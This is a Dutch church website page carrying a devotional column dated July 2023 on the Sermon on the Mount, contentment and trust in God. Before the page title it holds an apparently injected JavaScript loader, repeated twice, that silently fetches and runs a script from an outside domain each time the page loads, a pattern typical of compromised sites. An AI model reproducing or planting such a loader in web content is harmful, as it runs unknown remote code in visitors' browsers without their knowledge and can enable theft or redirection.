;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wat wil God ons meegeven? - PKN Damwâld

Wat wil God ons meegeven?

Gepubliceerd op: vrijdag 7 juli 2023

Veel daarvan staat in de Bergrede, zijn boodschap aan ons, aan de wereld. Hoe Hij wil dat we leven, en omgaan en omkijken naar elkaar en de wereld.

In mijn eerdere column gaf ik aan dat het goed is om tevreden te zijn met wat je hebt, te genieten van genoeg. Jezus gaat in de Bergrede (Matt. 5-7) nog verder: gelukkig de treurenden, gelukkig als je wordt vervolgd omdat je Mij volgt, keer je vijand de andere wang toe, heb je vijanden lief.

Dat is weer een heel andere opgave, hoe kun je dan gelukkig zijn, hoe houd je dat vol? Het antwoord is: niet alleen. Daar hebben we God voor nodig, Zijn hulp, Zijn troost, Zijn schuilplaats, Zijn Woord. En die kun je daar ook vinden: niet alleen de manier waarop God wil dat we leven en met elkaar omgaan, maar ook hoe je dat kunt doen. Met veel voorbeelden en uitleg over wat Hij van ons wil,  met deugden en leefregels, beloften en waarschuwingen, tips en houvast.

Het is veel en indrukwekkend, troostrijk maar ook een constante waarschuwing dat hoe we leven van invloed is op de wereld om ons heen.  En als een belofte: “Als je met Mij meegaat, ga Ik met jou. Je hoeft het niet zelf te doen, niet alleen. Vraag Mij om hulp, wijsheid, kracht en Ik zal er zijn voor je.”

En dat maakt gelukkig op een dieper niveau dan ons dagelijks klein geluk.  Gek genoeg voel je dat vaak sterker in zware periodes. Dan ervaar je steun, liefde, kracht en merk je dat je gedragen wordt. Laten we daarom altijd vertrouwen op God, Hem danken voor alles wat we ontvangen en Hem vragen om wat we nodig hebben. En ook al voel je soms twijfel, of ben je even afgedwaald: we mogen altijd weer bij Hem aankloppen, en Hij doet open.

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns